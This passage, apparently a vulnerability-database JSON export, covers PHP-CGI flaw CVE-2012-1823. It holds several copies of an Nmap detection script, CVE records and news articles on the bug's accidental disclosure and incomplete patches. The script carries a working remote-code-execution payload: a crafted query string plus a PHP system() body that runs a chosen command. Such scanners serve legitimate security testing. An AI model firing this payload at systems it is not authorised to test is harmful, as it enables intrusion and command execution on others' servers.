"zdt"}, {"idList": ["ELSA-2012-0546", "ELSA-2012-0547"], "type": "oraclelinux"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/PHP_CGI_ARG_INJECTION"], "type": "metasploit"}, {"idList": ["SAINT:383F4FB67DCF7CAE7E06F44A5B5DC13F", "SAINT:4757B9E50DEDA6FBFE3C977620C279FB", "SAINT:A44F3BA5218E70289A3DA48E0A2F5B88"], "type": "saint"}, {"idList": ["OPENVAS:71384", "OPENVAS:1361412562310123924", "OPENVAS:1361412562310120147", "OPENVAS:1361412562310881206", "OPENVAS:1361412562310831624", "OPENVAS:881165", "OPENVAS:1361412562310881165", "OPENVAS:831624", "OPENVAS:870593", "OPENVAS:870591"], "type": "openvas"}, {"idList": ["PACKETSTORM:112486", "PACKETSTORM:119075", "PACKETSTORM:112477", "PACKETSTORM:112971", "PACKETSTORM:123859", "PACKETSTORM:123833"], "type": "packetstorm"}, {"idList": ["THREATPOST:3EEA9D9B7CBDC9687FD961AD1AF59EF5", "THREATPOST:9FD19F2ACF1E3C44BAE775A250F1E132", "THREATPOST:4E1049C3C10581837DF71F684CB00683", "THREATPOST:A5E5D5921DAB8BB3CACFA91664901B61", "THREATPOST:2FB93CCBD166A84F825AED5B7F560EAD", "THREATPOST:D5EC8CB37BD901EEB297B27AA18015A9", "THREATPOST:8373133ADE8051980B6223ED1B2EBEF3", "THREATPOST:51FB010AA47AEB7BA9A071B3DC8D9989", "THREATPOST:219EFB4DE8A56286E444E303B599B79C", "THREATPOST:2ED66EF5DD7C982DF96F2B1625E26ABB"], "type": "threatpost"}]}, "score": {"value": 7.2, "vector": "NONE"}}, "hash": "48ff33b81beb002261684b52e28bfde537a87a7ebfff4922d2687b33d6f17b0c", "hashmap": [{"hash": "9113a85b267aed75977d6ed682018644", "key": "href"}, {"hash": "500a198d83b3613a2c02385748f4c791", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "027df2dddb7c093c8df7b95fe71a8da3", "key": "cvelist"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "2c264e6f89226c1e583fbe7641d70ac7", "key": "title"}, {"hash": "7a829ace16e007283a890055e1220c35", "key": "sourceData"}, {"hash": "9a5718258d0efd39579c9a90341563fb", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "d6d819a57819c5bc838131977e9a1464", "key": "description"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "146a8f6234ccf13c8678beda79d2f29a", "key": "nmap"}, {"hash": "513cd49ca78a02aaf27fbe2b0558ceec", "key": "modified"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2012-1823.html", "id": "NMAP:HTTP-VULN-CVE2012-1823.NSE", "lastseen": "2019-05-21T17:05:02", "modified": "2016-06-09T22:46:42", "nmap": {"categories": ["exploit", "vuln", "intrusive"], "scriptType": "portrule"}, "objectVersion": "1.3", "published": "2012-05-08T05:56:04", "references": [], "reporter": "Paulino Calderon <calderon@websec.mx>, Paul AMAR <aos.paul@gmail.com>", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nDetects PHP-CGI installations that are vulnerable to CVE-2012-1823, This\ncritical vulnerability allows attackers to retrieve source code and execute\ncode remotely.\n\nThe script works by appending \"?-s\" to the uri to make vulnerable php-cgi\nhandlers return colour syntax highlighted source. We use the pattern \"<span\nstyle=.*>&lt;?\" to detect\nvulnerable installations.\n]]\n\n---\n-- @usage\n-- nmap -sV --script http-vuln-cve2012-1823 <target>\n-- nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-vuln-cve2012-1823:\n-- | VULNERABLE:\n-- | PHP-CGI Remote code execution and source code disclosure\n-- | State: VULNERABLE (Exploitable)\n-- | IDs: CVE:2012-1823\n-- | Description:\n-- | According to PHP's website, \"PHP is a widely-used general-purpose\n-- | scripting language that is especially suited for Web development and\n-- | can be embedded into HTML.\" When PHP is used in a CGI-based setup\n-- | (such as Apache's mod_cgid), the php-cgi receives a processed query\n-- | string parameter as command line arguments which allows command-line\n-- | switches, such as -s, -d or -c to be passed to the php-cgi binary,\n-- | which can be exploited to disclose source code and obtain arbitrary\n-- | code execution.\n-- | Disclosure date: 2012-05-03\n-- | Extra information:\n-- | Proof of Concept:/index.php?-s\n-- | References:\n-- | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823\n-- |_ http://ompldr.org/vZGxxaQ\n--\n-- @args http-vuln-cve2012-1823.uri URI. Default: /index.php\n-- @args http-vuln-cve2012-1823.cmd CMD. Default: uname -a\n---\n\nauthor = {\"Paulino Calderon <calderon@websec.mx>\", \"Paul AMAR <aos.paul@gmail.com>\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\",\"vuln\",\"intrusive\"}\n\n\nportrule = shortport.http\n\naction = function(host, port)\n local uri = stdnse.get_script_args(SCRIPT_NAME..\".uri\") or \"/\"\n local cmd = stdnse.get_script_args(SCRIPT_NAME..\".cmd\") or \"uname -a\"\n\n local vuln = {\n title = 'PHP-CGI Remote code execution and source code disclosure',\n state = vulns.STATE.NOT_VULN, -- default\n IDS = {CVE = '2012-1823'},\n description = [[\nAccording to PHP's website, \"PHP is a widely-used general-purpose\nscripting language that is especially suited for Web development and\ncan be embedded into HTML.\" When PHP is used in a CGI-based setup\n(such as Apache's mod_cgid), the php-cgi receives a processed query\nstring parameter as command line arguments which allows command-line\nswitches, such as -s, -d or -c to be passed to the php-cgi binary,\nwhich can be exploited to disclose source code and obtain arbitrary\ncode execution.]],\n references = {\n 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/',\n 'http://ompldr.org/vZGxxaQ',\n },\n dates = {\n disclosure = {year = '2012', month = '05', day = '03'},\n },\n }\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n stdnse.debug2(\"Trying detection using echo command\")\n local detection_session = http.post(host, port, uri..\"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\", { no_cache = true }, nil, \"<?php system('echo NmapCVEIdentification');die(); ?>\")\n if detection_session and detection_session.status == 200 then\n if string.match(detection_session.body, \"NmapCVEIdentification\") then\n stdnse.debug1(\"The website seems vulnerable to CVE-2012-1823.\")\n else\n return\n end\n end\n\n stdnse.debug2(\"Trying Command... \" .. cmd)\n local exploitation_session = http.post(host, port, uri..\"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\", { no_cache = true }, nil, \"<?php system('\"..cmd..\"');die(); ?>\")\n if exploitation_session and exploitation_session.status == 200 then\n stdnse.debug1(\"Ouput of the command \" .. cmd .. \" : \\n\"..exploitation_session.body)\n vuln.state = vulns.STATE.EXPLOIT\n return vuln_report:make_output(exploitation_session.body)\n end\nend\n", "title": "http-vuln-cve2012-1823 NSE Script", "type": "nmap", "viewCount": 124}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2019-05-21T17:05:02"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1823"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely. \n\nThe script works by appending \"?-s\" to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern \"&lt;span style=.*&gt;&amp;lt;?\" to detect vulnerable installations.\n\n## Script Arguments \n\n#### http-vuln-cve2012-1823.uri \n\nURI. Default: /index.php\n\n#### http-vuln-cve2012-1823.cmd \n\nCMD. Default: uname -a\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -sV --script http-vuln-cve2012-1823 <target>\n nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-vuln-cve2012-1823:\n | VULNERABLE:\n | PHP-CGI Remote code execution and source code disclosure\n | State: VULNERABLE (Exploitable)\n | IDs: CVE:2012-1823\n | Description:\n | According to PHP's website, \"PHP is a widely-used general-purpose\n | scripting language that is especially suited for Web development and\n | can be embedded into HTML.\" When PHP is used in a CGI-based setup\n | (such as Apache's mod_cgid), the php-cgi receives a processed query\n | string parameter as command line arguments which allows command-line\n | switches, such as -s, -d or -c to be passed to the php-cgi binary,\n | which can be exploited to disclose source code and obtain arbitrary\n | code execution.\n | Disclosure date: 2012-05-03\n | Extra information:\n | Proof of Concept:/index.php?-s\n | References:\n | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\n | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823\n |_ http://ompldr.org/vZGxxaQ\n \n\n## Requires \n\n * http\n * shortport\n * stdnse\n * string\n * vulns\n\n* * *\n", "edition": 2, "enchantments": {}, "hash": "c84b5f35840f56837b4e79c28bceb984522b727cf6285ef5bb837617691f4e34", "hashmap": [{"hash": "9113a85b267aed75977d6ed682018644", "key": "href"}, {"hash": "500a198d83b3613a2c02385748f4c791", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "027df2dddb7c093c8df7b95fe71a8da3", "key": "cvelist"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "2c264e6f89226c1e583fbe7641d70ac7", "key": "title"}, {"hash": "7a829ace16e007283a890055e1220c35", "key": "sourceData"}, {"hash": "9a5718258d0efd39579c9a90341563fb", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "9c510c5788e051b17b27c58a7e7035a9", "key": "description"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "146a8f6234ccf13c8678beda79d2f29a", "key": "nmap"}, {"hash": "513cd49ca78a02aaf27fbe2b0558ceec", "key": "modified"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2012-1823.html", "id": "NMAP:HTTP-VULN-CVE2012-1823.NSE", "lastseen": "2017-04-24T16:56:38", "modified": "2016-06-09T22:46:42", "nmap": {"categories": ["exploit", "vuln", "intrusive"], "scriptType": "portrule"}, "objectVersion": "1.2", "published": "2012-05-08T05:56:04", "references": [], "reporter": "Paulino Calderon <calderon@websec.mx>, Paul AMAR <aos.paul@gmail.com>", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nDetects PHP-CGI installations that are vulnerable to CVE-2012-1823, This\ncritical vulnerability allows attackers to retrieve source code and execute\ncode remotely.\n\nThe script works by appending \"?-s\" to the uri to make vulnerable php-cgi\nhandlers return colour syntax highlighted source. We use the pattern \"<span\nstyle=.*>&lt;?\" to detect\nvulnerable installations.\n]]\n\n---\n-- @usage\n-- nmap -sV --script http-vuln-cve2012-1823 <target>\n-- nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-vuln-cve2012-1823:\n-- | VULNERABLE:\n-- | PHP-CGI Remote code execution and source code disclosure\n-- | State: VULNERABLE (Exploitable)\n-- | IDs: CVE:2012-1823\n-- | Description:\n-- | According to PHP's website, \"PHP is a widely-used general-purpose\n-- | scripting language that is especially suited for Web development and\n-- | can be embedded into HTML.\" When PHP is used in a CGI-based setup\n-- | (such as Apache's mod_cgid), the php-cgi receives a processed query\n-- | string parameter as command line arguments which allows command-line\n-- | switches, such as -s, -d or -c to be passed to the php-cgi binary,\n-- | which can be exploited to disclose source code and obtain arbitrary\n-- | code execution.\n-- | Disclosure date: 2012-05-03\n-- | Extra information:\n-- | Proof of Concept:/index.php?-s\n-- | References:\n-- | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823\n-- |_ http://ompldr.org/vZGxxaQ\n--\n-- @args http-vuln-cve2012-1823.uri URI. Default: /index.php\n-- @args http-vuln-cve2012-1823.cmd CMD. Default: uname -a\n---\n\nauthor = {\"Paulino Calderon <calderon@websec.mx>\", \"Paul AMAR <aos.paul@gmail.com>\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\",\"vuln\",\"intrusive\"}\n\n\nportrule = shortport.http\n\naction = function(host, port)\n local uri = stdnse.get_script_args(SCRIPT_NAME..\".uri\") or \"/\"\n local cmd = stdnse.get_script_args(SCRIPT_NAME..\".cmd\") or \"uname -a\"\n\n local vuln = {\n title = 'PHP-CGI Remote code execution and source code disclosure',\n state = vulns.STATE.NOT_VULN, -- default\n IDS = {CVE = '2012-1823'},\n description = [[\nAccording to PHP's website, \"PHP is a widely-used general-purpose\nscripting language that is especially suited for Web development and\ncan be embedded into HTML.\" When PHP is used in a CGI-based setup\n(such as Apache's mod_cgid), the php-cgi receives a processed query\nstring parameter as command line arguments which allows command-line\nswitches, such as -s, -d or -c to be passed to the php-cgi binary,\nwhich can be exploited to disclose source code and obtain arbitrary\ncode execution.]],\n references = {\n 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/',\n 'http://ompldr.org/vZGxxaQ',\n },\n dates = {\n disclosure = {year = '2012', month = '05', day = '03'},\n },\n }\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n stdnse.debug2(\"Trying detection using echo command\")\n local detection_session = http.post(host, port, uri..\"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\", { no_cache = true }, nil, \"<?php system('echo NmapCVEIdentification');die(); ?>\")\n if detection_session and detection_session.status == 200 then\n if string.match(detection_session.body, \"NmapCVEIdentification\") then\n stdnse.debug1(\"The website seems vulnerable to CVE-2012-1823.\")\n else\n return\n end\n end\n\n stdnse.debug2(\"Trying Command... \" .. cmd)\n local exploitation_session = http.post(host, port, uri..\"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\", { no_cache = true }, nil, \"<?php system('\"..cmd..\"');die(); ?>\")\n if exploitation_session and exploitation_session.status == 200 then\n stdnse.debug1(\"Ouput of the command \" .. cmd .. \" : \\n\"..exploitation_session.body)\n vuln.state = vulns.STATE.EXPLOIT\n return vuln_report:make_output(exploitation_session.body)\n end\nend\n", "title": "http-vuln-cve2012-1823 NSE Script", "type": "nmap", "viewCount": 8}, "differentElements": ["cvss", "cvelist", "sourceData"], "edition": 2, "lastseen": "2017-04-24T16:56:38"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "027df2dddb7c093c8df7b95fe71a8da3"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "description", "hash": "d6d819a57819c5bc838131977e9a1464"}, {"key": "href", "hash": "9113a85b267aed75977d6ed682018644"}, {"key": "modified", "hash": "513cd49ca78a02aaf27fbe2b0558ceec"}, {"key": "nmap", "hash": "146a8f6234ccf13c8678beda79d2f29a"}, {"key": "published", "hash": "500a198d83b3613a2c02385748f4c791"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9a5718258d0efd39579c9a90341563fb"}, {"key": "sourceData", "hash": "7a829ace16e007283a890055e1220c35"}, {"key": "title", "hash": "2c264e6f89226c1e583fbe7641d70ac7"}, {"key": "type", "hash": "7c0132070a0ef71d542663e9dc1f5dee"}], "hash": "1a163254f34269dc63b60c6d084f7b6e0743f47282e7885061e2c7f4b3a43a13", "viewCount": 173, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-1823"]}, {"type": "threatpost", "idList": ["THREATPOST:4E1049C3C10581837DF71F684CB00683", "THREATPOST:9FD19F2ACF1E3C44BAE775A250F1E132", "THREATPOST:3EEA9D9B7CBDC9687FD961AD1AF59EF5", "THREATPOST:51FB010AA47AEB7BA9A071B3DC8D9989", "THREATPOST:D5EC8CB37BD901EEB297B27AA18015A9", "THREATPOST:2FB93CCBD166A84F825AED5B7F560EAD", "THREATPOST:2ED66EF5DD7C982DF96F2B1625E26ABB", "THREATPOST:A5E5D5921DAB8BB3CACFA91664901B61", "THREATPOST:8373133ADE8051980B6223ED1B2EBEF3", "THREATPOST:219EFB4DE8A56286E444E303B599B79C"]}, {"type": "openvas", "idList": ["OPENVAS:831624", "OPENVAS:1361412562310881206", "OPENVAS:1361412562310870591", "OPENVAS:881206", "OPENVAS:870591", "OPENVAS:881180", "OPENVAS:1361412562310881180", "OPENVAS:870593", "OPENVAS:1361412562310831624", "OPENVAS:1361412562310120147"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2012-0547.NASL", "CENTOS_RHSA-2012-0547.NASL", "SL_20120507_PHP53_ON_SL5_X.NASL", "REDHAT-RHSA-2012-0569.NASL", "ORACLELINUX_ELSA-2012-0547.NASL", "CENTOS_RHSA-2012-0546.NASL", "SL_20120507_PHP_ON_SL5_X.NASL", "PHP_5_4_2.NASL", "FREEBSD_PKG_60DE13D595F011E1806A001143CD36D8.NASL", "ORACLELINUX_ELSA-2012-0546.NASL"]}, {"type": "redhat", "idList": ["RHSA-2012:0547", "RHSA-2012:0546", "RHSA-2012:0570", "RHSA-2012:0568", "RHSA-2012:0569"]}, {"type": "zdt", "idList": ["1337DAY-ID-21429"]}, {"type": "freebsd", "idList": ["60DE13D5-95F0-11E1-806A-001143CD36D8"]}, {"type": "centos", "idList": ["CESA-2012:0547", "CESA-2012:0546"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28089"]}, {"type": "seebug", "idList": ["SSV:60093", "SSV:60536", "SSV:61070", "SSV:82805", "SSV:72860", "SSV:79637", "SSV:72859"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112486", "PACKETSTORM:123833", "PACKETSTORM:112477", "PACKETSTORM:123859", "PACKETSTORM:119075", "PACKETSTORM:112971"]}, {"type": "saint", "idList": ["SAINT:4757B9E50DEDA6FBFE3C977620C279FB", "SAINT:383F4FB67DCF7CAE7E06F44A5B5DC13F", "SAINT:A44F3BA5218E70289A3DA48E0A2F5B88"]}, {"type": "thn", "idList": ["THN:26139DCDB80F29AA56F9DB9ADFBD986B", "THN:F0587F0EFE1B937682CDBA5338BDE708"]}, {"type": "symantec", "idList": ["SMNTC-53388"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0547", "ELSA-2012-0546"]}, {"type": "cert", "idList": ["VU:673343", "VU:520827"]}, {"type": "amazon", "idList": ["ALAS-2012-077"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/PHP_CGI_ARG_INJECTION"]}, {"type": "canvas", "idList": ["PHP_CGI_REMOTE"]}, {"type": "ubuntu", "idList": ["USN-1437-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2012:0590-1"]}], "modified": "2019-05-30T17:04:51"}, "score": {"value": 8.8, "vector": "NONE", "modified": "2019-05-30T17:04:51"}, "vulnersScore": 8.8}, "objectVersion": "1.3", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nDetects PHP-CGI installations that are vulnerable to CVE-2012-1823, This\ncritical vulnerability allows attackers to retrieve source code and execute\ncode remotely.\n\nThe script works by appending \"?-s\" to the uri to make vulnerable php-cgi\nhandlers return colour syntax highlighted source. We use the pattern \"<span\nstyle=.*>&lt;?\" to detect\nvulnerable installations.\n]]\n\n---\n-- @usage\n-- nmap -sV --script http-vuln-cve2012-1823 <target>\n-- nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-vuln-cve2012-1823:\n-- | VULNERABLE:\n-- | PHP-CGI Remote code execution and source code disclosure\n-- | State: VULNERABLE (Exploitable)\n-- | IDs: CVE:2012-1823\n-- | Description:\n-- | According to PHP's website, \"PHP is a widely-used general-purpose\n-- | scripting language that is especially suited for Web development and\n-- | can be embedded into HTML.\" When PHP is used in a CGI-based setup\n-- | (such as Apache's mod_cgid), the php-cgi receives a processed query\n-- | string parameter as command line arguments which allows command-line\n-- | switches, such as -s, -d or -c to be passed to the php-cgi binary,\n-- | which can be exploited to disclose source code and obtain arbitrary\n-- | code execution.\n-- | Disclosure date: 2012-05-03\n-- | Extra information:\n-- | Proof of Concept:/index.php?-s\n-- | References:\n-- | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823\n-- |_ http://ompldr.org/vZGxxaQ\n--\n-- @args http-vuln-cve2012-1823.uri URI. Default: /index.php\n-- @args http-vuln-cve2012-1823.cmd CMD. Default: uname -a\n---\n\nauthor = {\"Paulino Calderon <calderon@websec.mx>\", \"Paul AMAR <aos.paul@gmail.com>\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\",\"vuln\",\"intrusive\"}\n\n\nportrule = shortport.http\n\naction = function(host, port)\n local uri = stdnse.get_script_args(SCRIPT_NAME..\".uri\") or \"/\"\n local cmd = stdnse.get_script_args(SCRIPT_NAME..\".cmd\") or \"uname -a\"\n\n local vuln = {\n title = 'PHP-CGI Remote code execution and source code disclosure',\n state = vulns.STATE.NOT_VULN, -- default\n IDS = {CVE = '2012-1823'},\n description = [[\nAccording to PHP's website, \"PHP is a widely-used general-purpose\nscripting language that is especially suited for Web development and\ncan be embedded into HTML.\" When PHP is used in a CGI-based setup\n(such as Apache's mod_cgid), the php-cgi receives a processed query\nstring parameter as command line arguments which allows command-line\nswitches, such as -s, -d or -c to be passed to the php-cgi binary,\nwhich can be exploited to disclose source code and obtain arbitrary\ncode execution.]],\n references = {\n 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/',\n 'http://ompldr.org/vZGxxaQ',\n },\n dates = {\n disclosure = {year = '2012', month = '05', day = '03'},\n },\n }\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n stdnse.debug2(\"Trying detection using echo command\")\n local detection_session = http.post(host, port, uri..\"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\", { no_cache = true }, nil, \"<?php system('echo NmapCVEIdentification');die(); ?>\")\n if detection_session and detection_session.status == 200 then\n if string.match(detection_session.body, \"NmapCVEIdentification\") then\n stdnse.debug1(\"The website seems vulnerable to CVE-2012-1823.\")\n else\n return\n end\n end\n\n stdnse.debug2(\"Trying Command... \" .. cmd)\n local exploitation_session = http.post(host, port, uri..\"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\", { no_cache = true }, nil, \"<?php system('\"..cmd..\"');die(); ?>\")\n if exploitation_session and exploitation_session.status == 200 then\n stdnse.debug1(\"Ouput of the command \" .. cmd .. \" : \\n\"..exploitation_session.body)\n vuln.state = vulns.STATE.EXPLOIT\n return vuln_report:make_output(exploitation_session.body)\n end\nend\n", "nmap": {"categories": ["exploit", "vuln", "intrusive"], "scriptType": "portrule"}, "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:12:21", "bulletinFamily": "NVD", "description": "sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.", "modified": "2018-01-18T02:29:00", "id": "CVE-2012-1823", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823", "published": "2012-05-11T10:15:00", "title": "CVE-2012-1823", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T23:03:09", "bulletinFamily": "info", "description": "[](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>)The PHP Group on Tuesday is planning to release another new version of the scripting language that\u2019s designed to address, again, the [remotely exploitable flaw](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>) that came to light last week. That bug, which requires no authentication, was supposed to have been fixed in new releases pushed out on May 3, but they didn\u2019t completely address the problem.\n\nAfter The [PHP Group released new versions](<https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/>) of the language, the research team that initially discovered the flaw warned that the fixes didn\u2019t completely address the issue and still left sites vulnerable. The researchers, known as Eindbazen, discovered the vulnerability during a capture the flag competition earlier this year and were working with PHP developers and US-CERT on a fix. But the bug was disclosed accidentally when the PHP internal tracking system mistakenly marked the bug as public before a patch was ready.\n\nThe PHP Group on Friday released two new versions of the language, but Eindbazen said that they did not completely fix the problem.\n\n\u201cThe new PHP release is buggy. You can use their mitigation mod_rewrite rule, but the patch and new released versions do not fix the problem. At the bottom we have added a version of the PHP patch that fixes the obvious problem with the patch merged in the recently released security update,\u201d the team said. \n\nNow, the PHP developers are planning to push out another new release on Tuesday to hopefully fix the flaw.\n\n\u201cPHP 5.3.12/5.4.2 do not fix all variations of the CGI issues described in CVE-2012-1823. It has also come to our attention that some sites use an insecure cgiwrapper script to run PHP. These scripts will use **$*** instead of **\u201c$@\u201d** to pass parameters to php-cgi which causes a number of issues. Again, people using mod_php or php-fpm are not affected,\u201d The PHP Group said.\n\n\u201cAnother set of releases are planned for Tuesday, May, 8th. These releases will fix the CGI flaw and another CGI-related issue in apache_request_header (5.4 only).\u201d\n\n \n\n", "modified": "2013-04-17T16:32:17", "published": "2012-05-08T14:46:23", "id": "THREATPOST:4E1049C3C10581837DF71F684CB00683", "href": "https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/76537/", "type": "threatpost", "title": "PHP Group Set to Release Another Patch for CVE-2012-1823 Flaw", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:08", "bulletinFamily": "info", "description": "**UPDATE**\u2013The developers of PHP have released new versions of the scripting language to fix a [remotely exploitable vulnerability](<https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/>) announced earlier this week that enables an attacker to pass command-line arguments to the PHP binary. The flaw has been in the code for more than eight years and The PHP Group was working on a patch for it when the bug was disclosed accidentally on Reddit. However, the team that found the bug says the new versions of PHP don\u2019t actually fix the vulnerability. \n\nThe new versions of PHP are available now and the developers recommend that users upgrade as soon as possible. PHP versions 5.3.12 and 5.4.2 both contain the fix for the vulnerability. \n\n\u201cWe\u2019ve tested this and have confirmed that the query parameters are passed to the php5-cgi binary in this configuration. Since the wrapper script merely passes all the arguments on to the actual php-cgi binary, the same problem exists with configurations where php-cgi is directly copied into the cgi-bin directory. It\u2019s interesting to note that while slashes get added to any shell metacharacters we pass in the query string, spaces and dashes (\u2018-\u2019) are not escaped. So we can pass as many options to PHP as we want!\u201d the team that discovered the flaw, known as [Eindbazen](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>), wrote in their analysis of the bug. \n\nEindbazen said in an updated post that the PHP patch isn\u2019t sufficient to fix the bug.\n\n\u201cThe new PHP release is buggy. You can use their mitigation mod_rewrite rule, but the patch and new released versions do not fix the problem. At the bottom we have added a version of the PHP patch that fixes the obvious problem with the patch merged in the recently released security update,\u201d the team said. \n\nThe PHP Group is working on a new fix for the vulnerability now.\n\n\u201cWe have received word that new PHP updates with the revised fix will be released soon. The issue that this problem was not properly fixed by the original security update is being tracked as CVE-2012-2311,\u201d Eindbazen said.\n\nThe PHP Group also had some other problems this week, specifically a problem in its internal bug-handling system that resulted in the private discussion on the CVE-2012-1823 vulnerability being marked as public. That led to the bug being posted to Reddit. The Eindbazen team then posted the details of the bug, which they had discovered in January during a capture the flag contest.\n\n\u201cThere is a vulnerability in certain CGI-based setups **(Apache+mod_php and nginx+php-fpm are not affected)** that has gone unnoticed for at least 8 years. [Section 7 of the CGI spec](<http://tools.ietf.org/html/draft-robinson-www-interface-00#section-7>) states:\n\nSome systems support a method for supplying a [sic] array of strings to the CGI script. This is only used in the case of an `indexed\u2019 query. This is identified by a \u201cGET\u201d or \u201cHEAD\u201d HTTP request with a URL search string not containing any unencoded \u201c=\u201d characters.\n\nSo, requests that do not have a \u201c=\u201d in the query string are treated differently from those who do in some CGI implementations. For PHP this means that a request containing ?-s may dump the PHP source code for the page, but a request that has ?-s&amp;=1 is fine.\n\nA large number of sites run PHP as either an Apache module through mod_php or using php-fpm under nginx. Neither of these setups are vulnerable to this. Straight shebang-style CGI also does not appear to be vulnerable,\u201d the [PHP Group](<http://www.php.net/archive/2012.php#id2012-05-03-1>) said in its release notes for the new versions. \u201cIf you are using Apache mod_cgi to run PHP 